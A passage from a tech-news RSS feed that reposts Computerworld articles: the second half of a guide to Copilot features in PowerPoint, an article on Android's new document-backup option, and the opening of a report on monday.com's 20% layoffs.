<p class="wp-block-paragraph"><strong>Agent mode:</strong> By default, Copilot can build a new presentation or make changes to an existing one in the main PowerPoint window. This is known as “agent mode.” To change this so that Copilot can’t take direct action on a presentation (all its responses appear in the sidebar), click the <em>Allow editing</em> button above the chat window and change it to <em>Chat only</em>.</p>



<p class="wp-block-paragraph">The tips in this guide require that Copilot be in agent mode, so make sure you see <em>Allow editing</em> above the chat window.</p>



<p class="wp-block-paragraph"><strong>Choice of AI model:</strong> Behind the scenes, Copilot has access to various genAI models, including different versions of Anthropic Claude and OpenAI GPT.  By default, it decides which model to use based on your prompt. You can set it to use a particular model: click <em>Auto</em> at the upper right of the Copilot pane and select a model from the dropdown that opens.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-02-sidebar-model-dropdown.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with models dropdown menu open" class="wp-image-4195063" width="1024" height="697" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>You can choose which AI model you want Copilot to use for a request.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">The tips in this guide should work fine on the default <em>Auto</em> setting. But feel free to experiment switching to specific models to see which give you the best results for particular tasks.</p>



<p class="wp-block-paragraph"><strong>Important:</strong> Remember that <a href="https://www.computerworld.com/article/4059383/openai-admits-ai-hallucinations-are-mathematically-inevitable-not-just-engineering-flaws.html">generative AI output often includes errors</a>, so always check Copilot’s output for accuracy. (Also see our <a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">tips for reducing hallucinations in Copilot</a>.) You’ll likely want to rewrite it in your own voice as you’re reviewing it.</p>



<h2 class="wp-block-heading"><a></a>1. Create a presentation template</h2>



<p class="wp-block-paragraph">For many people, the hardest part of creating a presentation is getting started. What types of information should be included on the slides, and in what order? Copilot can give you a leg up by creating the type of presentation you need, with placeholder data that you can later replace with your own.</p>



<p class="wp-block-paragraph">Start a new presentation, open the Copilot sidebar, and type your prompt into the chat window. It’s best to provide very specific details in your prompt. The more context or details you provide, the more likely Copilot will generate a presentation template that suits your needs.</p>



<p class="wp-block-paragraph">A good prompt should contain the slide count, subject, audience, and tone. Example:</p>



<ul class="wp-block-list">
<li><em>Create a 6-slide presentation for a sales meeting focusing on Q1 revenue. The audience is the sales team, so keep the tone professional and focused on the sales data.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot may ask a series of follow-up questions, such as your preferred visual style and desired level of detail. Then it will generate a presentation template.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-03-generated-presentation-with-placeholder-data.png?w=1024" alt="screenshot of powerpoint presentation generated by copilot with placeholder data" class="wp-image-4195064" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot generates a presentation with placeholder data and explains its elements.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">You can optionally prompt Copilot for revisions, and when you’re happy with the template, swap in your own data.</p>



<h2 class="wp-block-heading"><a></a>2. Create a presentation from a document</h2>



<p class="wp-block-paragraph">You can attach a document (such as a Word document, Excel spreadsheet, or PDF) and prompt Copilot to generate a presentation based on its contents. This works best with a structured-format document (such as a business plan, project proposal, or summary report) that contains sections with headings.</p>



<p class="wp-block-paragraph">Copilot can extract the document’s text and structure to generate the slide content for the new presentation. This can especially be useful for quickly turning a long report into a visually appealing presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, click the <em>+</em> icon at the bottom of the chat window. A list of documents that you’ve recently accessed appears. Select the one that you want Copilot to use. Alternatively, click the magnifying glass icon and inside its search box, type a few letters of the filename for the document you want. (Business users with an M365 Copilot license can select up to five files for Copilot to pull from when creating a presentation.)</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-04-attach-document.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with a document being attached for copilot to base a presentation on" class="wp-image-4195062" width="1024" height="733" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Attaching a document for Copilot to base a presentation on.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Then in the chat window, you can enter a prompt that’s as simple as “<em>Create a presentation</em>,” although as always, providing more details and context is better. This is especially important for corporate users who reference multiple source files. It’s useful to tell Copilot what data to pull from each document.</p>



<p class="wp-block-paragraph">Answer any follow-up questions that Copilot asks, and it will then generate the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-05-generated-presentation-from-doc.png?w=1024" alt="screenshot of powerpoint with a presentation generated by copilot from a document" class="wp-image-4195067" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot has generated a professional presentation from a social media marketing campaign document.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note: Your marketing department may have created one or more <a href="https://support.microsoft.com/en-US/PowerPoint/copilot/keep-your-presentation-on-brand-with-copilot" target="_blank" rel="noreferrer noopener">branded company templates for Copilot to work from</a>. If that’s the case at your organization, simply open the appropriate company template as your first step. Then you can upload docs and type a prompt as described above. Copilot will create a presentation using the branded template.</p>



<h2 class="wp-block-heading"><a></a>3. Add content from a document to a slide</h2>



<p class="wp-block-paragraph">Manually copying text or other content from a document and pasting it into a new slide is a chore. Instead, you can prompt Copilot to extract information directly from a Word document, Excel spreadsheet, or PDF to create new slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, attach the document using the same steps described in tip 2, then tell Copilot to create a slide from the document. As always, it helps to provide details such as the new slide’s focus or what data to include:</p>



<ul class="wp-block-list">
<li><em>Add a slide based on the attached document.</em></li>



<li><em>Use the attached file to add a slide about the project budget that focuses on Q1 projections.</em></li>



<li><em>Summarize only the financial section of the attached document as a slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-06-generated-slide-from-spreadsheet.png?w=1024" alt="screenshot of a slide in powerpoint generated by copilot from spreadsheet data" class="wp-image-4195068" width="1024" height="612" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A new Copilot-generated slide based on data from an Excel spreadsheet.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a><a></a>4. Refine your slide text</h2>



<p class="wp-block-paragraph">A presentation should be visual and display only the core message. Conciseness and proper writing tone are essential for your slides, so that they don’t lose the attention of your audience.</p>



<p class="wp-block-paragraph">You can prompt Copilot to refine text on an individual slide in various ways, such as rewriting it in a more professional tone or making it more concise. Highlight the text inside a text box on the slide. On the toolbar that appears over the highlighted text, click <em>Edit with Copilot</em>.</p>



<p class="wp-block-paragraph">On the menu that opens, you can select a preset prompt to refine the text, such as <em>Condense</em> or <em>Make professional</em>. Or, at the top of this menu, you can type a prompt to rewrite the highlighted text.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-07-refine-slide-text-options-menu.png" alt="screenshot of text on a powerpoint slide with copilot dropdown menu includng condense and make professional options" class="wp-image-4195066" width="960" height="690" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="wp-element-caption"><p>Choose a preset prompt for refining text on a slide or type in your own prompt.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Note that this feature affects all the text inside the text box. To rewrite only a portion of text inside a text box, you must split that portion out into a separate text box.</p>



<p class="wp-block-paragraph">Alternatively, you can prompt Copilot to analyze your entire presentation and tighten up the wording throughout all of its slides. For example:</p>



<ul class="wp-block-list">
<li><em>Make these slides more visual and use less text.</em></li>
</ul>



<h2 class="wp-block-heading">5. Find or create an image</h2>



<p class="wp-block-paragraph">If you have Copilot generate a presentation from an existing Word document that contains images, it will incorporate those images into the presentation. If there are no images in the source document, you can ask Copilot to find or create one and add it to a slide.</p>



<p class="wp-block-paragraph">To add a stock image or an image from your organization’s brand library, tell Copilot what you’re looking for:</p>



<ul class="wp-block-list">
<li><em>Add a stock photo of young adults in a cafe drinking boba tea.</em></li>



<li><em>Add a photo from our asset library of young adults in a cafe drinking boba tea.</em></li>
</ul>



<p class="wp-block-paragraph">To have Copilot create an image using Microsoft’s Designer image generation tool, describe your desired image. As always, specificity is helpful:</p>



<ul class="wp-block-list">
<li><em>Create a photorealistic image of a diverse group of 5 or 6 fashionable young adults sitting in a cafe drinking boba tea. They’re smiling or laughing, and some are looking at their phones.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-08-generate-image.png?w=1024" alt="screenshot of image generation prompt in copilot sidebar in powerpoint plus the resulting generated image on a slide" class="wp-image-4195097" width="1024" height="594" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot in PowerPoint hooks into Microsoft’s Designer tool for image generation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">Just as you need to review any text output from Copilot, take a close look at generated images to be sure nothing looks off. </p>



<p class="wp-block-paragraph">Also note that Copilot image generation isn’t always reliable in PowerPoint. For some time during our testing for this story, Copilot said it couldn’t create an image because “the image generation service is returning a server error on every attempt.” After about a day and a half, the service began working again.</p>



<h2 class="wp-block-heading"><a></a>6. Expand your presentation with relevant slides</h2>



<p class="wp-block-paragraph">As you’re building your presentation, you may find that it’s become text heavy. Or perhaps it could use more visually oriented slides to break things up and make its progression flow better. Copilot can generate and insert new slides that are based on the content of the slides already in the presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, specify exactly where you want the new slide to go. This helps Copilot to analyze the content of the slides before and after where you want the new slide. Then it can generate a slide to bridge between the two slides. Examples:</p>



<ul class="wp-block-list">
<li><em>Add a slide after slide 3 about our competitive advantages.</em></li>



<li><em>Add a slide after slide 11 that transitions to slide 12.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-09-generated-transition-slide.png?w=1024" alt="screenshot of powerpoint screen with copilot sidebar and a transition slide generated by copilot" class="wp-image-4195094" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Need a transition slide? Just ask!</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading">7. Summarize a presentation</h2>



<p class="wp-block-paragraph">Maybe you need a quick refresh of your presentation before an important meeting. Or maybe a co-worker has sent you a presentation that’s packed with lots of slides. You can prompt Copilot to generate a summary of the presentation’s overall messaging.</p>



<p class="wp-block-paragraph">In the Copilot pane, just type “<em>summarize this presentation</em>.” You can also have Copilot flag key slides that contain important information: “<em>show me key slides</em>.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-10-summarize-key-slides.png?w=1024" alt="screenshots of copilot sidebar in powerpoint - one with summarize results and one with key slides response" class="wp-image-4195095" width="1024" height="774" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot to summarize a presentation or flag key slides.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>8. Answer questions about a presentation</h2>



<p class="wp-block-paragraph">As you’re reviewing a presentation, especially one that you didn’t create and are not familiar with, you can get Copilot to pull key data points from its slides.</p>



<p class="wp-block-paragraph">In the Copilot pane, type specific informational questions. Examples:</p>



<ul class="wp-block-list">
<li><em>What are the action items in this deck?</em></li>



<li><em>What is the proposed budget mentioned here?</em></li>
</ul>



<p class="wp-block-paragraph">If Copilot can’t find the exact answer to the question you ask, it will provide related information from the presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-11-ask-questions-about-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response to query about proposed budget in the slide deck" class="wp-image-4195093" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ask Copilot specific questions about the contents of a presentation.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">This method can also help you validate that your presentation includes everything you want it to. If you ask Copilot about the action items in a presentation and it can’t find any, you know you need to add them. (Copilot will likely offer to generate them for you based on the rest of the slides.)</p>



<p class="wp-block-paragraph">You can even take this tactic a step further and ask Copilot if the presentation is missing any important data, if any slides are weak or confusing, if there are any awkward transitions, if there are key points that should be better emphasized, and so on.</p>



<h2 class="wp-block-heading"><a></a>9. Help you navigate a large presentation</h2>



<p class="wp-block-paragraph">In the business world, presentations with dozens of slides are not uncommon, such as for financial reports or project documentation. Trying to find a specific slide or multiple slides can be tough. Copilot can help you navigate such a presentation.</p>



<p class="wp-block-paragraph">In the Copilot pane, prompt Copilot to find slides based on specific topics. Example:</p>



<ul class="wp-block-list">
<li><em>Show me the slides about the project timeline.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will analyze the presentation and reply with a list of links to the relevant slides. Click one of these to jump directly to that slide.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-12-navigate-presentation.png?w=1024" alt="screenshot of copilot sidebar in powerpoint with response about the slide that talks about target audience" class="wp-image-4195096" width="1024" height="760" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can help you zoom directly to a slide that covers a particular topic or shows specific data.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h2 class="wp-block-heading"><a></a>10. Generate speaker notes and/or an FAQ</h2>



<p class="wp-block-paragraph">Here’s a great timesaver when you’re preparing to show your presentation to an audience: Copilot can automatically generate suggested speaker notes for you, based on the content of your slides. Example prompt:</p>



<ul class="wp-block-list">
<li><em>Write speaker notes for every slide with one talking point per slide.</em></li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-13-speaker-notes.png?w=1024" alt="screenshot of powerpoint presentation with speaker notes generated by copilot" class="wp-image-4195092" width="1024" height="607" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Copilot can create speaker notes in seconds.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<p class="wp-block-paragraph">In a related feature, Copilot can create a frequently asked questions list (FAQ) for you to consult in your speaker notes or to present as a slide:</p>



<ul class="wp-block-list">
<li><em>Write an FAQ for these slides.</em></li>
</ul>



<p class="wp-block-paragraph">Copilot will ask where you want the questions and answers added — as a new slide at the end, integrated into the speaker notes of relevant slides, or somewhere else that you designate. Make a selection, and Copilot will generate the FAQ based on the content of your presentation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-14-generated-faq-slide.png?w=1024" alt="screenshot of frequently asked questions slide generated by copilot in powerpoint" class="wp-image-4195091" width="1024" height="609" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>A Copilot-generated FAQ slide.</p>
</figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



<h4 class="wp-block-heading"><strong>Related reading:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4119411/11-cool-things-copilot-can-do-in-excel.html">11 cool things Copilot can do in Excel</a></li>



<li><a href="https://www.computerworld.com/article/4022584/9-ways-copilot-can-turbocharge-onenote.html">9 ways Copilot can turbocharge OneNote</a></li>



<li><a href="https://www.computerworld.com/article/1647230/powerpoint-for-microsoft-365-cheat-sheet.html">PowerPoint for Microsoft 365 cheat sheet</a></li>



<li><a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat: Your hub for document creation and analysis</a></li>



<li><a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">How to curb hallucinations in Copilot (and other genAI tools)</a></li>



<li><a href="https://www.computerworld.com/article/3479705/how-to-use-microsoft-copilot-for-writing-in-microsoft-365-word-outlook-onenote.html">Microsoft Copilot can boost your writing in Word, Outlook, and OneNote — here’s how</a></li>



<li><a href="https://www.computerworld.com/article/1682358/microsoft-cheat-sheets-dive-into-windows-and-office-apps.html">More Microsoft tips and tutorials</a></li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your instant Android backup upgrade]]></title>
<description><![CDATA[Here in this high-tech era of 2026, keeping important info backed up and synced should be effortless and something that just happens on its own, automatically, without any actual thought or ongoing human effort.



In many areas of our digital life, that mercifully does Just Work™ in exactly that...]]></description>
<link>https://tsecurity.de/de/3694774/ai-nachrichten/your-instant-android-backup-upgrade/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694774/ai-nachrichten/your-instant-android-backup-upgrade/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Here in this high-tech era of 2026, keeping important info backed up and synced <em>should </em>be effortless and something that just happens on its own, automatically, without any actual thought or ongoing human effort.</p>



<p class="wp-block-paragraph">In many areas of our digital life, that mercifully does Just Work™ in exactly that way. Fire up an email in most modern mail services, and you can stop at any point and find your in-progress draft in that same app on any other device. The same applies to any file you’re finessing within Google Drive or other cloud storage services or document you’re dawdling over in Docs.</p>



<p class="wp-block-paragraph">One area where seamless syncing somehow still <em>doesn’t</em> occur, though, is in the domain of <em>downloaded </em>documents on Android. If someone sends you a PDF or a Word file and you save it to your phone, that file exists in an archaic-seeming silo — only locally, on <em>that</em> one gadget. And that, of course, means (a) you can’t access it from any other device, and (b) if you misplace your phone or move into a new one at some point along the way, the file will be left behind in time and entirely unavailable.</p>



<p class="wp-block-paragraph">Well, take a moment to join me in celebration: Amidst all the <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">Gemini gobbledegook</a> that <a href="https://www.computerworld.com/article/2117752/google-gemini-ai.html">no one asked for</a> (and that often falls somewhere between <a href="https://www.computerworld.com/article/4182583/ai-creepy-era.html">“pointless”</a> and <a href="https://www.computerworld.com/article/3990497/google-gemini-deceit.html">“actively counterproductive”</a>), Google’s giving us a major upgrade to Android’s backup capabilities right now. It’s a simple-seeming switch buried in your system settings, and it’s up to <em>you</em> to find and activate it.</p>



<p class="wp-block-paragraph">Once you do, though, those once-orphaned documents on your Android device’s local storage will be perpetually synced and protected, automatically, without any ongoing thought or effort.</p>



<p class="wp-block-paragraph">All <em>you’ve </em>gotta do is find and flip that one new switch.</p>



<p class="wp-block-paragraph"><strong>[Don’t let yourself miss an ounce of Android Intelligence. </strong><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong>Join my free weekly Android Intelligence newsletter</strong></a><strong> and get one new thing to try in your inbox every Friday!]</strong></p>



<h2 class="wp-block-heading"><strong>The Android backup lowdown</strong></h2>



<p class="wp-block-paragraph">So, for a quick bit of pertinent context on this: Android’s backup systems have actually come a really long way over the years.</p>



<p class="wp-block-paragraph">‘Twas a time, y’see, when little to nothing about you would sync and carry over automatically from one Android device to another. Years ago — back in the ancient-seeming prehistoric era of the early 2010s — Android enthusiasts in the know would rely on community-created third-party apps for everything from remembering and resyncing downloaded apps to restoring data from within those apps and onward. And reconfiguring your system preferences would be a whole time-consuming song and dance every single time you reset a device or moved into a new one, as little to nothing would automatically carry over.</p>



<p class="wp-block-paragraph">Most of that stuff is now effortless and automatic. And, thanks to apps like Google Messages, Calendar, Drive, and Docs, many <em>other </em>areas of important data are also synced on their own at the app level — outside of any system mechanisms.</p>



<p class="wp-block-paragraph">Locally stored files, however, have remained an awkward omission. To this day, anything you download on any Android device exists only on <em>that</em> <em>one device </em>and isn’t synced or backed up anywhere. The only way that happens is — in a blast-from-the-past twist — if <em>you </em>go out of your way to <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=a%20new%20one.-,Files,-The%20easiest%20way">find and set up a third-party app to handle the heavy lifting</a>.</p>



<p class="wp-block-paragraph">That brings us to today. Right now, as we speak, Google’s in the midst of sending out a quiet under-the-hood update that (brace yourself…) adds in the option to automatically sync and back up any documents on your device as a native part of Android’s backup setup.</p>



<p class="wp-block-paragraph">See?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-backup-documents.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android backup documents" class="wp-image-4198961" width="1024" height="546" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">The easily overlooked new option for backing up documents on Android.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">The option is on its way to all devices running 2018’s <a href="https://www.computerworld.com/article/1698598/android-9-pie.html">Android 9 release</a> and higher. (If you’re still using a phone with an <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html">Android version</a> older than that, you’re now a whopping <em>eight years </em>out of date, and you have <a href="https://www.computerworld.com/article/1718016/android-upgrades-matter.html"><em>much</em> bigger problems</a>.)</p>



<p class="wp-block-paragraph">Once the added option is present and available for you, you’re literally lookin’ at 10 seconds to find and activate it.</p>



<p class="wp-block-paragraph">Lemme show ya how.</p>



<h2 class="wp-block-heading"><strong>Android’s document backup addition</strong></h2>



<p class="wp-block-paragraph">I promise: This couldn’t be much simpler.</p>



<p class="wp-block-paragraph">No matter what kind of Android device is in front of you, just head into your system settings and open the section called “Accounts and backup,” “Back up or copy data,” or something along those same lines. (The exact wording can vary based on who made your device and when it was released or last updated.)</p>



<p class="wp-block-paragraph">Either tap the line labeled “Google Backup” or look for an option to “Back up data” via Google Drive. You should then either see a series of options for different areas of available backup right then and there — or, depending on your device, you might have to tap a line labeled “Other device data” (or something similar) to find the full list of possibilities.</p>



<p class="wp-block-paragraph">However you get there, once you’re lookin’ at that list, you’ll see a newly added line for “Documents” if this latest under-the-hood update has reached you.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/android-backup-options.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android backup options" class="wp-image-4198962" width="1024" height="742" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Android’s expanded list of backup options — now including documents alongside other forms of on-device data.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p class="wp-block-paragraph">And from there, all that’s left is to tap it and enable the switch to include that in your automated backups from that moment forward.</p>



<p class="wp-block-paragraph">If you aren’t seeing the option yet, don’t panic. Google always sends these under-the-hood updates out bit by bit over time, so the change probably just hasn’t reached your device quite yet. As long as you’re running Android 9 or higher, it’ll get there. Set yourself a reminder to check back once a week or so. Odds are, you’ll see it pretty soon.</p>



<p class="wp-block-paragraph">Notably, all documents synced in this way are always encrypted for security, and they’re kept in your personal (or, depending on the nature of your account, perhaps company-connected) Google Drive storage. That <em>does</em> mean they’ll count against your overall Google storage total, so keep an eye on your <a href="https://drive.google.com/drive/u/0/quota" target="_blank" rel="noreferrer noopener">Drive storage total</a> to make sure you’re in solid shape and look to the <a href="https://one.google.com/storage/management?from=1&amp;g1_landing_page=1" target="_blank" rel="noreferrer noopener">Google One storage hub</a> if you ever want some simple suggestions for freeing up space.</p>



<p class="wp-block-paragraph">Speaking of other Google services: If you ever want to keep <em>other</em> types of locally stored <em>non</em>-document files from an Android device synced and available elsewhere, you can easily rely on <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=in-app%20upgrade.-,Photos%20and%20music,-OK%2C%20so%20they">Google Photos for syncing screenshots and other images</a> — after enabling sync in general, be sure to look in the app’s “Collections” areas to find the “On this device” folder and then flip the toggle to “Backup all device folders” (or get more nuanced and open specific <em>individual </em>on-device folders if you want to sync some but not all of those areas) — and you can still turn to <a href="https://www.computerworld.com/article/1711741/how-to-back-up-android-phones-complete-guide.html#:~:text=a%20new%20one.-,Files,-The%20easiest%20way">those aforementioned third-party apps</a> for broader syncing of anything else imaginable.</p>



<p class="wp-block-paragraph">But with documents now being handled automatically and natively, that’s one big worry now out of your hair. Just note that the onus will fall on <em>you </em>to find and flip the switch and actively opt in to the feature on each and every Android device you’re using.</p>



<p class="wp-block-paragraph">Take 10 seconds to do that, though, and you’ll have one less void in your Android data arena. And you don’t need Gemini to tell you that <em>that </em>can only be a good thing.</p>



<p class="wp-block-paragraph"><em>Get practical Android knowledge in your inbox every Friday with </em><a href="https://www.theintelligence.com/android-cw/" target="_blank" rel="noreferrer noopener"><strong><em>my free Android Intelligence newsletter</em></strong></a><strong><em> </em></strong><em>— one new thing to try each week, straight from me to you.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
<link>https://tsecurity.de/de/3694771/ai-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694771/ai-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



